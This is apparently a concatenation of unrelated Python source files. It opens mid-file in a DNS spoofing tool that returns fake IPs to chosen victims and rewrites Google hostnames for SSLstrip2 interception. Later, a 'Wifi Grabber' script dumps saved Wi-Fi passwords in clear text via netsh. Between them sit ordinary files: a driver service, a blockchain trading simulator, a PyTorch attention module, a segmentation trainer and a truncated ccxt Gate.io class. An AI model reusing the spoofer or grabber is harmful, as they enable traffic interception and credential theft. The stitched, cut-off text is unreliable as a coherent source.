rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, dominios[dominio])
resp.answer.append(rrset)
return resp, dosleep
ips = respuestas(qname.lower(), 'A')
if qname.lower() not in spoof and isinstance(ips, numbers.Integral):
# SSLSTRIP2 transformation
punto = host.find(".")
dominio = host[punto:]
host2 = ''
if host[:5] == 'wwww.' or host[:7] == 'social.':
host2 = 'www%s' % dominio
elif host[:3] == 'web':
host2 = host[3:]
elif host[:7] == 'cuentas':
host2 = 'accounts%s' % dominio
elif host[:5] == 'gmail':
host2 = 'mail%s' % dominio
elif host == 'chatenabled.gmail.google.com': # Yes, It is ugly....
host2 = 'chatenabled.mail.google.com'
if host2 != '':
DEBUGLOG('SSLStrip transforming host: %s => %s ...' % (host, host2))
ips = respuestas(host2, 'A')
#print '>>> Victim: %s Answer 0: %s'%(prov_ip,prov_resp)
if isinstance(ips, numbers.Integral):
DEBUGLOG('No host....')
resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN
return resp, dosleep
prov_resp = ips[0]
consultas[prov_ip] = prov_resp
ttl = 1
if (host not in nospoof) and (prov_ip not in nospoofto) and (len(victims) == 0 or prov_ip in victims):
if host in spoof:
save_req(LOGREQFILE, '!!! Specific host (' + host + ') asked....\n')
for spoof_ip in spoof[host].split(","):
DEBUGLOG('Adding fake IP = ' + spoof_ip)
rrset = dns.rrset.from_text(q.name, 1000, dns.rdataclass.IN, dns.rdatatype.A, spoof_ip)
resp.answer.append(rrset)
return resp, dosleep
elif Forward:
consultas[prov_ip] = prov_resp
#print 'DEBUG: Adding consultas[%s]=%s'%(prov_ip,prov_resp)
if ip1 is not None:
rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, ip1)
DEBUGLOG('Adding fake IP = ' + ip1)
resp.answer.append(rrset)
if ip2 is not None:
#Sleep only when using global resquest matrix
dosleep = True
rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, ip2)
DEBUGLOG('Adding fake IP = ' + ip2)
resp.answer.append(rrset)
if len(fake_ips)>0:
for fip in fake_ips:
rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, fip)
DEBUGLOG('Adding fake IP = ' + fip)
resp.answer.append(rrset)
if not Forward and prov_ip not in nospoofto:
if len(fake_ips) == 0:
DEBUGLOG('No forwarding....')
resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN
elif len(fake_ips) > 0:
DEBUGLOG('No forwarding (but adding fake IPs)...')
for fip in fake_ips:
rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, fip)
DEBUGLOG('Adding fake IP = ' + fip)
resp.answer.append(rrset)
return resp, dosleep
for realip in ips:
DEBUGLOG('Adding real IP = ' + realip.to_text())
rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, realip.to_text())
resp.answer.append(rrset)
return resp, dosleep
# def std_A2_qry(msg):
# qs = msg.question
# DEBUGLOG(str(len(qs)) + ' questions.')
# iparpa = qs[0].to_text().split(' ',1)[0]
# print 'Host: '+ iparpa
# resp = make_response(qry=msg)
# rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.A, '4.4.45.4')
# resp.answer.append(rrset)
# return resp
def std_ASPOOF_qry(msg):
global spoof
qs = msg.question
DEBUGLOG(str(len(qs)) + ' questions.')
iparpa = qs[0].to_text().split(' ', 1)[0]
DEBUGLOG('Host: ' + iparpa)
resp = make_response(qry=msg)
for q in qs:
qname = q.name.to_text()[:-1]
DEBUGLOG('q name = ' + qname) + ' to resolve ' + spoof[qname]
# rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.facebook.com.')
# resp.answer.append(rrset)
# rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.yahoo.com.')
# resp.answer.append(rrset)
# rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.tuenti.com.')
# resp.answer.append(rrset)
# rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.twitter.com.')
# resp.answer.append(rrset)
rrset = dns.rrset.from_text(q.name, 1000, dns.rdataclass.IN, dns.rdatatype.A, spoof[qname])
resp.answer.append(rrset)
return resp
def make_response(qry=None, id=None, RCODE=0):
if qry is None and id is None:
raise Exception, 'bad use of make_response'
if qry is None:
resp = dns.message.Message(id)
# QR = 1
resp.flags |= dns.flags.QR
if RCODE != 1:
raise Exception, 'bad use of make_response'
else:
resp = dns.message.make_response(qry)
resp.flags |= dns.flags.AA
resp.flags |= dns.flags.RA
resp.set_rcode(RCODE)
return resp
process_files()
Resolver.reset()
Resolver.read_resolv_conf(RESOLVCONF)
signal.signal(signal.SIGUSR1, SIGUSR1_handle)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', 53))
if Forward:
DEBUGLOG('DNS Forwarding activado....')
else:
DEBUGLOG('DNS Forwarding desactivado....')
DEBUGLOG('binded to UDP port 53.')
serving_ids = []
noserv = True
if ip1 is not None and ip2 is not None and Forward:
sniff = ThreadSniffer()
sniff.start()
while True:
if noserv:
DEBUGLOG('waiting requests.')
try:
message, address = s.recvfrom(1024)
noserv = True
except socket.error as (code, msg):
if code != errno.EINTR:
raise
if noserv:
DEBUGLOG('serving a request.')
requestHandler(address, message)
|
py | 1a303a0002877f40cc5192228c1d3443ee8203e9 | from xml.etree.ElementTree import TreeBuilder
from app.models.entities.driver import Driver
from app.models.entities.vehicle import Vehicle
from app.models.result import Result
from app.extensions import db
from app.models.view.driver_view_model import DriverViewModel
class DriverService:
def __init__(self) -> None:
pass
def insert_driver(self, driver: Driver) -> Result:
result = driver.is_valid()
if not result.success:
return result
driverAlreadyExistsByName = Driver.query.filter_by(name=driver.name).first()
if driverAlreadyExistsByName:
return Result(success=False, message="Ja existe um motorista cadastrado com o nome informado!")
driverAlreadyExistsByCPF = Driver.query.filter_by(cpf=driver.cpf).first()
if driverAlreadyExistsByCPF:
return Result(success=False, message="Ja existe um motorista cadastrado com o cpf informado!")
db.session.add(driver)
db.session.commit()
return Result(success= True, message= "Motorista registrado com sucesso!")
def update_driver(self, current_driver: Driver, driver_view: DriverViewModel):
current_driver.fill_update(driver_view)
result = current_driver.is_valid()
if not result.success:
return result
db.session.commit()
return Result(success=True, message="Motorista atualizado com sucesso!")
def delete_driver(self, driver: Driver):
vehicle = Vehicle.query.filter_by(driver_id=driver.id).first()
if vehicle != None:
return Result(success=False, message='''Existem veiculos cadastradados com este motorista!
Delete antes os veiculos associados para deletar
o motorista.''')
db.session.delete(driver)
db.session.commit()
return Result(success=True, message="Motorista deletado com sucesso!")
def get_all(self):
return Driver.query.all() |
py | 1a303a3f59492eed209748189cef41bdb68cdfa4 | # This file is part of the Blockchain Data Trading Simulator
# https://gitlab.com/MatthiasLohr/bdtsim
#
# Copyright 2021 Matthias Lohr <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import logging
import multiprocessing
import os
from multiprocessing.pool import ApplyResult
from typing import Any, Dict, Optional, Tuple
from queue import Queue
import yaml
from bdtsim.account import AccountFile
from bdtsim.data_provider import DataProviderManager
from bdtsim.environment import EnvironmentManager
from bdtsim.protocol import ProtocolManager, DEFAULT_ASSET_PRICE
from bdtsim.renderer import RendererManager
from bdtsim.simulation import Simulation
from bdtsim.simulation_result import SimulationResult, SimulationResultSerializer
from bdtsim.util.types import to_bool
from .command_manager import SubCommand
DEFAULT_ENVIRONMENT_CONFIGURATION: Dict[str, Any] = {'name': 'PyEVM'}
DEFAULT_DATA_PROVIDER_CONFIGURATION: Dict[str, Any] = {'name': 'RandomDataProvider'}
logger = logging.getLogger(__name__)
class BulkExecuteSubCommand(SubCommand):
help = 'bulk execute simulations and renderings'
def __init__(self, parser: argparse.ArgumentParser) -> None:
super(BulkExecuteSubCommand, self).__init__(parser)
parser.add_argument('bulk_configuration')
parser.add_argument('-p', '--processes', type=int, default=multiprocessing.cpu_count())
def __call__(self, args: argparse.Namespace) -> Optional[int]:
with open(args.bulk_configuration, 'r') as fp:
bulk_configuration = yaml.load(fp, Loader=yaml.SafeLoader)
logger.info('creating process pool with %i processes' % args.processes)
process_pool = multiprocessing.Pool(processes=args.processes)
processes: Queue[ApplyResult[Any]] = Queue()
simulation_configurations = bulk_configuration.get('simulations')
if not isinstance(simulation_configurations, list):
raise ValueError('simulations is not a list')
renderer_configurations = bulk_configuration.get('renderers')
if not isinstance(simulation_configurations, list):
raise ValueError('renderers is not a list')
target_directory = bulk_configuration.get('target_directory', 'bulk_output')
os.makedirs(target_directory, exist_ok=True)
def renderer_success_callback(params: Tuple[Dict[str, Any], Dict[str, Any], bytes]) -> None:
sim_conf, renderer_conf, result = params
logger.info('renderer succeeded (%s, %s)' % (str(sim_conf), str(renderer_conf)))
with open(os.path.join(
target_directory,
self.get_output_filename(sim_conf, renderer_conf, suffix=renderer_conf.get('suffix'))
), 'wb') as f:
f.write(result)
def renderer_error_callback(error: BaseException) -> None:
logger.warning('renderer error: %s' % str(error))
def simulation_success_callback(params: Tuple[Dict[str, Any], SimulationResult]) -> None:
local_simulation_configuration, result = params
logger.info('simulation succeeded (%s)' % str(local_simulation_configuration))
logger.debug('writing down result')
with open(os.path.join(
target_directory,
self.get_output_filename(local_simulation_configuration, suffix='result')
), 'wb') as f:
simulation_result_serializer = SimulationResultSerializer(
compression=to_bool(bulk_configuration.get('output_compression', True)),
b64encoding=to_bool(bulk_configuration.get('output_b64encoding', True))
)
f.write(simulation_result_serializer.serialize(result))
logger.debug('scheduling renderers')
for renderer_configuration in renderer_configurations:
processes.put(process_pool.apply_async(
func=self.run_renderer,
kwds={
'simulation_configuration': local_simulation_configuration,
'renderer_configuration': renderer_configuration,
'simulation_result': result
},
callback=renderer_success_callback,
error_callback=renderer_error_callback
))
def simulation_error_callback(error: BaseException) -> None:
logger.warning('simulation error callback called: %s' % str(error))
logger.debug('scheduling simulations')
for simulation_configuration in simulation_configurations:
processes.put(process_pool.apply_async(
func=self.run_simulation,
kwds={
'simulation_configuration': simulation_configuration
},
callback=simulation_success_callback,
error_callback=simulation_error_callback
))
while not processes.empty():
process = processes.get(block=True)
process.wait()
return 0
@staticmethod
def run_simulation(simulation_configuration: Dict[str, Any]) -> Tuple[Dict[str, Any], SimulationResult]:
protocol_configuration = simulation_configuration.get('protocol')
environment_configuration = simulation_configuration.get('environment')
data_provider_configuration = simulation_configuration.get('data_provider')
if protocol_configuration is None:
raise ValueError('missing protocol configuration')
if environment_configuration is None:
environment_configuration = DEFAULT_ENVIRONMENT_CONFIGURATION
if data_provider_configuration is None:
data_provider_configuration = DEFAULT_DATA_PROVIDER_CONFIGURATION
protocol = ProtocolManager.instantiate(
name=protocol_configuration.get('name', ''),
**protocol_configuration.get('parameters', {})
)
account_file = AccountFile(simulation_configuration.get('account_file'))
environment = EnvironmentManager.instantiate(
name=environment_configuration.get('name', ''),
operator=account_file.operator,
seller=account_file.seller,
buyer=account_file.buyer,
**environment_configuration.get('parameters', {})
)
data_provider = DataProviderManager.instantiate(
name=data_provider_configuration.get('name', ''),
**data_provider_configuration.get('parameters', {})
)
simulation = Simulation(
protocol=protocol,
environment=environment,
data_provider=data_provider,
operator=account_file.operator,
seller=account_file.seller,
buyer=account_file.buyer,
protocol_path_coercion=simulation_configuration.get('protocol_path'),
price=simulation_configuration.get('price', DEFAULT_ASSET_PRICE),
)
simulation_result = simulation.run()
return simulation_configuration, simulation_result
@staticmethod
def run_renderer(simulation_configuration: Dict[str, Any], renderer_configuration: Dict[str, Any],
simulation_result: SimulationResult) -> Tuple[Dict[str, Any], Dict[str, Any], bytes]:
renderer = RendererManager.instantiate(
name=renderer_configuration.get('name', ''),
**renderer_configuration.get('parameters', {})
)
result = renderer.render(simulation_result)
return simulation_configuration, renderer_configuration, result
@staticmethod
def get_output_filename(simulation_configuration: Dict[str, Any],
renderer_configuration: Optional[Dict[str, Any]] = None,
suffix: Optional[str] = None) -> str:
def component2str(component_config: Dict[str, Any]) -> str:
result = str(component_config.get('name'))
parameter_lines = []
for key, value in component_config.get('parameters', {}).items():
parameter_lines.append('%s=%s' % (key, value))
if len(parameter_lines):
result += '-%s' % '-'.join(parameter_lines)
return result
output = '_'.join([
component2str(simulation_configuration.get('protocol', {})),
component2str(simulation_configuration.get('environment', {})),
component2str(simulation_configuration.get('data_provider', DEFAULT_DATA_PROVIDER_CONFIGURATION))
])
if renderer_configuration is not None:
output += '_%s' % component2str(renderer_configuration)
if suffix is not None:
output += '.%s' % suffix
return output
|
py | 1a303a7e7556b807d8dabca004224fcf8f7c42f0 | import pyross.tsi.deterministic
|
py | 1a303bbba43054c984f5a7800187e46e2cf1cea5 | """
Raspberry Pi tests.
"""
|
py | 1a303c7c062fd43b40ab19c623d931b57fd096f7 | import torch
import torch.nn as nn
class ACM(nn.Module):
# def __init__(self, in_channels, num_heads=32, orthogonal_loss=True):
def __init__(self, in_channels, num_heads=8, orthogonal_loss=True):
super(ACM, self).__init__()
assert in_channels % num_heads == 0
self.in_channels = in_channels
self.num_heads = num_heads
self.add_mod = AttendModule(self.in_channels, num_heads=num_heads)
self.sub_mod = AttendModule(self.in_channels, num_heads=num_heads)
self.mul_mod = ModulateModule(channel=self.in_channels, num_groups=num_heads, compressions=2)
self.orthogonal_loss = orthogonal_loss
self.init_parameters()
def init_parameters(self):
if self.add_mod is not None:
self.add_mod.init_parameters()
if self.sub_mod is not None:
self.sub_mod.init_parameters()
if self.mul_mod is not None:
self.mul_mod.init_parameters()
def forward(self, x):
mu = x.mean([2, 3], keepdim=True)
x_mu = x - mu
# creates multipying feature
mul_feature = self.mul_mod(mu) # P
# creates add or sub feature
add_feature = self.add_mod(x_mu) # K
# creates add or sub feature
sub_feature = self.sub_mod(x_mu) # Q
y = (x + add_feature - sub_feature) * mul_feature
if self.orthogonal_loss:
dp = torch.mean(add_feature * sub_feature, dim=1, keepdim=True)
return y, dp
else:
return y
class AttendModule(nn.Module):
def __init__(self, in_channels, num_heads=4):
super(AttendModule, self).__init__()
self.num_heads = int(num_heads)
self.in_channels = in_channels
self.num_c_per_head = self.in_channels // self.num_heads
assert self.in_channels % self.num_heads == 0
self.map_gen = nn.Sequential(
nn.Conv2d(in_channels, num_heads, kernel_size=1, stride=1, padding=0, bias=True, groups=num_heads)
)
self.normalize = nn.Softmax(dim=2)
self.return_weight = False
def init_parameters(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
nn.init.constant_(m.bias, 0.0)
def batch_weighted_avg(self, xhats, weights):
b, c, h, w = xhats.shape
# xhat reshape
xhats_reshape = xhats.view(b * self.num_heads, self.num_c_per_head, h, w)
xhats_reshape = xhats_reshape.view(b * self.num_heads, self.num_c_per_head, h * w)
# weight reshape
weights_reshape = weights.view(b * self.num_heads, 1, h, w)
weights_reshape = weights_reshape.view(b * self.num_heads, 1, h * w)
weights_normalized = self.normalize(weights_reshape)
weights_normalized = weights_normalized.transpose(1, 2)
mus = torch.bmm(xhats_reshape, weights_normalized)
mus = mus.view(b, self.num_heads * self.num_c_per_head, 1, 1)
return mus, weights_normalized
def forward(self, x):
b, c, h, w = x.shape
weights = self.map_gen(x)
mus, weights_normalized = self.batch_weighted_avg(x, weights)
if self.return_weight:
weights_normalized = weights_normalized.view(b, self.num_heads, h * w, 1)
weights_normalized = weights_normalized.squeeze(-1)
weights_normalized = weights_normalized.view(b, self.num_heads, h, w)
weights_splitted = torch.split(weights_normalized, 1, 1)
return mus, weights_splitted
return mus
class ModulateModule(nn.Module):
def __init__(self, channel, num_groups=32, compressions=2):
super(ModulateModule, self).__init__()
self.feature_gen = nn.Sequential(
nn.Conv2d(channel, channel//compressions, kernel_size=1, stride=1, padding=0, bias=True, groups=num_groups),
nn.ReLU(inplace=True),
nn.Conv2d(channel//compressions, channel, kernel_size=1, stride=1, padding=0, bias=True, groups=num_groups),
nn.Sigmoid()
)
def init_parameters(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
nn.init.constant_(m.bias, 0.0)
def forward(self, x):
y = self.feature_gen(x)
return y
if __name__ == '__main__':
x1 = torch.randn(256 * 20 * 20 * 5).view(5, 256, 20, 20).float()
acm = ACM(num_heads=32, in_channels=256, orthogonal_loss=True)
acm.init_parameters()
y, dp = acm(x1)
print(y.shape)
print(dp.shape)
# ACM without orthogonal loss
acm = ACM(num_heads=32, in_channels=256, orthogonal_loss=False)
acm.init_parameters()
y = acm(x1)
print(y.shape)
|
py | 1a303d137c88cb611703c2d83001fd5964a1e2d4 | import subprocess
import time
import os
localtime = time.asctime( time.localtime(time.time()))
data = subprocess.check_output(['netsh','wlan','show','profiles']).decode('utf-8').split('\n')
profiles = [i.split(":")[1][1:-1] for i in data if "All User Profile" in i]
file = open("result.txt", "a")
print("\n[+] Wifi Grabber: " + localtime + "\n")
file.write("\n[+] Wifi Grabber: " + localtime + "\n")
print("========================================================",file=file)
print(localtime, file=file)
print("========================================================",file=file)
file.close
for i in profiles:
results = subprocess.check_output(['netsh','wlan','show','profile',i,
'key=clear']).decode("utf-8").split('\n')
results = [b.split(":")[1][1:-1] for b in results if "Key Content" in b]
try:
print("{:<30} | {:<}".format(i, results[0]),file=file)
file.close
except IndexError:
print("{:<30} | {:<}".format(i, ""))
time.sleep(3)
exit(code=True)
|
py | 1a303e265fe5afb1b4c1ab347327b59041b58f21 | ###########################################################################
# Created by: Hang Zhang
# Email: [email protected]
# Copyright (c) 2017
###########################################################################
import os, sys
BASE_DIR = os.path.dirname(os.path.dirname(os.getcwd()))
sys.path.append(BASE_DIR)
import yaml
import argparse
import numpy as np
from addict import Dict
import torch
import torch.nn as nn
from torch.utils import data
from tensorboardX import SummaryWriter
import torchvision.transforms as transform
from torch.nn.parallel.scatter_gather import gather
import encoding.utils as utils
from encoding.nn import SegmentationLosses, SyncBatchNorm
from encoding.parallel import DataParallelModel, DataParallelCriterion
from encoding.datasets import get_dataset
from encoding.models import get_segmentation_model
CONFIG_PATH = './results/config.yaml'
SMY_PATH = os.path.dirname(CONFIG_PATH)
GPUS = [0, 1]
# model settings
parser = argparse.ArgumentParser(description='model specification')
parser.add_argument('--with_att', action='store_true', default= False, help='whether use attention to fuse rgb and dep')
parser.add_argument('--att_type', type=str, default='AG2', help='Attention type to fuse rgb and dep')
settings= parser.parse_args()
print('settings attention:{} attention type:{}'.format(settings.with_att, settings.att_type))
class Trainer():
def __init__(self, args):
self.args = args
# data transforms
input_transform = transform.Compose([
transform.ToTensor(), # convert RGB [0,255] to FloatTensor in range [0, 1]
transform.Normalize([.485, .456, .406], [.229, .224, .225])]) # mean and std based on imageNet
dep_transform = transform.Compose([
transform.ToTensor(),
transform.Normalize(mean=[0.2798], std=[0.1387]) # mean and std for depth
])
# dataset
data_kwargs = {'transform': input_transform, 'dep_transform': dep_transform,
'base_size': args.base_size, 'crop_size': args.crop_size}
trainset = get_dataset(args.dataset, split=args.train_split, mode='train', **data_kwargs)
testset = get_dataset(args.dataset, split='val', mode='val', **data_kwargs)
# dataloader
kwargs = {'num_workers': args.workers, 'pin_memory': True} if args.cuda else {}
self.trainloader = data.DataLoader(trainset, batch_size=args.batch_size, drop_last=True, shuffle=True, **kwargs)
self.valloader = data.DataLoader(testset, batch_size=args.batch_size, drop_last=False, shuffle=False, **kwargs)
self.nclass = trainset.num_class
# model and params
model = get_segmentation_model(args.model, dataset=args.dataset, backbone=args.backbone, pretrained=True,
root='../../encoding/models/pretrain', n_features=256,
with_att=settings.with_att, att_type=settings.att_type,
)
print(model)
# optimizer using different LR
base_ids = list(map(id, model.base.parameters()))
base_dep_ids = list(map(id, model.dep_base.parameters()))
base_params = filter(lambda p: id(p) in base_ids + base_dep_ids, model.parameters())
other_params = filter(lambda p: id(p) not in base_ids + base_dep_ids, model.parameters())
self.optimizer = torch.optim.SGD([{'params': base_params, 'lr': args.lr},
{'params': other_params, 'lr': args.lr * 10}],
lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)
# criterions
self.criterion = SegmentationLosses(se_loss=args.se_loss,
aux=args.aux,
nclass=self.nclass,
se_weight=args.se_weight,
aux_weight=args.aux_weight)
# lr scheduler
self.scheduler = utils.LR_Scheduler_Head(args.lr_scheduler, args.lr, args.epochs,
iters_per_epoch=len(self.trainloader), warmup_epochs=10)
self.best_pred = 0.0
# using cuda
self.device = torch.device("cuda:0" if args.cuda else "cpu")
if args.cuda:
if torch.cuda.device_count() > 1:
print("Let's use", torch.cuda.device_count(), "GPUs!") # [30,xxx]->[10,...],[10,...],[10,...] on 3 GPUs
model = nn.DataParallel(model, device_ids=GPUS)
self.model = model.to(self.device)
# for writing summary
path = "/".join(("{}-{}".format(*i) for i in settings.__dict__.items()))
self.writer = SummaryWriter(os.path.join(SMY_PATH, path))
# resuming checkpoint
if args.resume is not None and args.resume != 'None':
if not os.path.isfile(args.resume):
raise RuntimeError("=> no checkpoint found at '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
args.start_epoch = checkpoint['epoch']
if args.cuda:
self.model.module.load_state_dict(checkpoint['state_dict'])
else:
self.model.load_state_dict(checkpoint['state_dict'])
if not args.ft:
self.optimizer.load_state_dict(checkpoint['optimizer'])
self.best_pred = checkpoint['best_pred']
print("=> loaded checkpoint '{}' (epoch {})".format(args.resume, checkpoint['epoch']))
# clear start epoch if fine-tuning
if args.ft:
args.start_epoch = 0
def training(self, epoch):
train_loss = 0.0
self.model.train()
total_inter, total_union, total_correct, total_label, total_loss = 0, 0, 0, 0, 0
for i, (image, dep, target) in enumerate(self.trainloader):
image, dep, target = image.to(self.device), dep.to(self.device), target.to(self.device)
self.scheduler(self.optimizer, i, epoch, self.best_pred)
self.optimizer.zero_grad()
outputs = self.model(image, dep)
loss = self.criterion(outputs, target)
loss.backward()
self.optimizer.step()
correct, labeled = utils.batch_pix_accuracy(outputs.data, target)
inter, union = utils.batch_intersection_union(outputs.data, target, self.nclass)
total_correct += correct
total_label += labeled
total_inter += inter
total_union += union
train_loss += loss.item()
if (i+1) % 50 == 0:
print('epoch {}, step {}, loss {}'.format(epoch + 1, i + 1, train_loss / 50))
self.writer.add_scalar('train_loss', train_loss / 50, epoch * len(self.trainloader) + i)
train_loss = 0.0
pixAcc = 1.0 * total_correct / (np.spacing(1) + total_label)
IOU = 1.0 * total_inter / (np.spacing(1) + total_union)
mIOU = IOU.mean()
print('epoch {}, pixel Acc {}, mean IOU {}'.format(epoch + 1, pixAcc, mIOU))
self.writer.add_scalar("mean_iou/train", mIOU, epoch)
self.writer.add_scalar("pixel accuracy/train", pixAcc, epoch)
def train_n_evaluate(self):
for epoch in range(self.args.epochs):
# run on one epoch
print("\n===============train epoch {}/{} ==========================\n".format(epoch, self.args.epochs))
# one full pass over the train set
self.training(epoch)
# evaluate for one epoch on the validation set
print('\n===============start testing, training epoch {}\n'.format(epoch))
pixAcc, mIOU, loss = self.validation(epoch)
print('evaluation pixel acc {}, mean IOU {}, loss {}'.format(pixAcc, mIOU, loss))
# save the best model
is_best = False
new_pred = (pixAcc + mIOU) / 2
if new_pred > self.best_pred:
is_best = True
self.best_pred = new_pred
utils.save_checkpoint({'epoch': epoch + 1,
'state_dict': self.model.module.state_dict(),
'optimizer': self.optimizer.state_dict(),
'best_pred': self.best_pred}, self.args, is_best)
def validation(self, epoch):
# Fast test during the training
def eval_batch(model, image, dep, target):
# model, image, target already moved to gpus
pred = model(image, dep)
loss = self.criterion(pred, target)
correct, labeled = utils.batch_pix_accuracy(pred.data, target)
inter, union = utils.batch_intersection_union(pred.data, target, self.nclass)
return correct, labeled, inter, union, loss
self.model.eval()
total_inter, total_union, total_correct, total_label, total_loss = 0, 0, 0, 0, 0
for i, (image, dep, target) in enumerate(self.valloader):
image, dep, target = image.to(self.device), dep.to(self.device), target.to(self.device)
with torch.no_grad():
correct, labeled, inter, union, loss = eval_batch(self.model, image, dep, target)
total_correct += correct
total_label += labeled
total_inter += inter
total_union += union
total_loss += loss.item()
pixAcc = 1.0 * total_correct / (np.spacing(1) + total_label)
IOU = 1.0 * total_inter / (np.spacing(1) + total_union)
mIOU = IOU.mean()
if i % 40 == 0:
print('eval mean IOU {}'.format(mIOU))
loss = total_loss / len(self.valloader)
self.writer.add_scalar("mean_iou/val", mIOU, epoch)
self.writer.add_scalar("pixel accuracy/val", pixAcc, epoch)
return pixAcc, mIOU, loss
if __name__ == "__main__":
print("-------mark program start----------")
# configuration
args = Dict(yaml.safe_load(open(CONFIG_PATH)))
args.cuda = (args.use_cuda and torch.cuda.is_available())
args.resume = None if args.resume=='None' else args.resume
torch.manual_seed(args.seed)
trainer = Trainer(args)
# import pdb; pdb.set_trace()
print('Starting Epoch:', trainer.args.start_epoch)
print('Total Epoches:', trainer.args.epochs)
trainer.train_n_evaluate()
|
py | 1a303ec63cfa30e4d3af946a584e1b191fd1c6c5 | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.base.exchange import Exchange
import hashlib
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import PermissionDenied
from ccxt.base.errors import AccountSuspended
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import BadRequest
from ccxt.base.errors import BadSymbol
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import RateLimitExceeded
from ccxt.base.errors import ExchangeNotAvailable
from ccxt.base.decimal_to_precision import TICK_SIZE
from ccxt.base.precise import Precise
class gateio(Exchange):
def describe(self):
return self.deep_extend(super(gateio, self).describe(), {
'id': 'gateio',
'name': 'Gate.io',
'countries': ['KR'],
'rateLimit': 10 / 3, # 300 requests per second or 3.33ms
'version': 'v4',
'certified': True,
'pro': True,
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/31784029-0313c702-b509-11e7-9ccc-bc0da6a0e435.jpg',
'doc': 'https://www.gate.io/docs/apiv4/en/index.html',
'www': 'https://gate.io/',
'api': {
'public': 'https://api.gateio.ws/api/v4',
'private': 'https://api.gateio.ws/api/v4',
},
'referral': {
'url': 'https://www.gate.io/ref/2436035',
'discount': 0.2,
},
},
'has': {
'cancelOrder': True,
'createMarketOrder': False,
'createOrder': True,
'fetchBalance': True,
'fetchClosedOrders': True,
'fetchCurrencies': True,
'fetchDeposits': True,
'fetchFundingRate': True,
'fetchFundingRateHistory': True,
'fetchFundingRates': True,
'fetchIndexOHLCV': True,
'fetchMarkets': True,
'fetchMarkOHLCV': True,
'fetchMyTrades': True,
'fetchOHLCV': True,
'fetchOpenOrders': True,
'fetchOrder': True,
'fetchPremiumIndexOHLCV': False,
'fetchTicker': True,
'fetchTickers': True,
'fetchTime': False,
'fetchTrades': True,
'fetchWithdrawals': True,
'transfer': True,
'withdraw': True,
},
'api': {
'public': {
'spot': {
'get': {
'currencies': 1,
'currencies/{currency}': 1,
'currency_pairs': 1,
'currency_pairs/{currency_pair}': 1,
'tickers': 1,
'order_book': 1,
'trades': 1,
'candlesticks': 1,
},
},
'margin': {
'get': {
'currency_pairs': 1,
'currency_pairs/{currency_pair}': 1,
'cross/currencies': 1,
'cross/currencies/{currency}': 1,
},
},
'futures': {
'get': {
'{settle}/contracts': 1.5,
'{settle}/contracts/{contract}': 1.5,
'{settle}/order_book': 1.5,
'{settle}/trades': 1.5,
'{settle}/candlesticks': 1.5,
'{settle}/tickers': 1.5,
'{settle}/funding_rate': 1.5,
'{settle}/insurance': 1.5,
'{settle}/contract_stats': 1.5,
'{settle}/liq_orders': 1.5,
},
},
'delivery': {
'get': {
'{settle}/contracts': 1.5,
'{settle}/contracts/{contract}': 1.5,
'{settle}/order_book': 1.5,
'{settle}/trades': 1.5,
'{settle}/candlesticks': 1.5,
'{settle}/tickers': 1.5,
'{settle}/insurance': 1.5,
},
},
},
'private': {
'withdrawals': {
'post': {
'': 3000, # 3000 = 10 seconds
},
'delete': {
'{withdrawal_id}': 300,
},
},
'wallet': {
'get': {
'deposit_address': 300,
'withdrawals': 300,
'deposits': 300,
'sub_account_transfers': 300,
'withdraw_status': 300,
'sub_account_balances': 300,
'fee': 300,
},
'post': {
'transfers': 300,
'sub_account_transfers': 300,
},
},
'spot': {
'get': {
'accounts': 1,
'open_orders': 1,
'orders': 1,
'orders/{order_id}': 1,
'my_trades': 1,
'price_orders': 1,
'price_orders/{order_id}': 1,
},
'post': {
'batch_orders': 1,
'orders': 1,
'cancel_batch_orders': 1,
'price_orders': 1,
},
'delete': {
'orders': 1,
'orders/{order_id}': 1,
'price_orders': 1,
'price_orders/{order_id}': 1,
},
},
'margin': {
'get': {
'accounts': 1.5,
'account_book': 1.5,
'funding_accounts': 1.5,
'loans': 1.5,
'loans/{loan_id}': 1.5,
'loans/{loan_id}/repayment': 1.5,
'loan_records': 1.5,
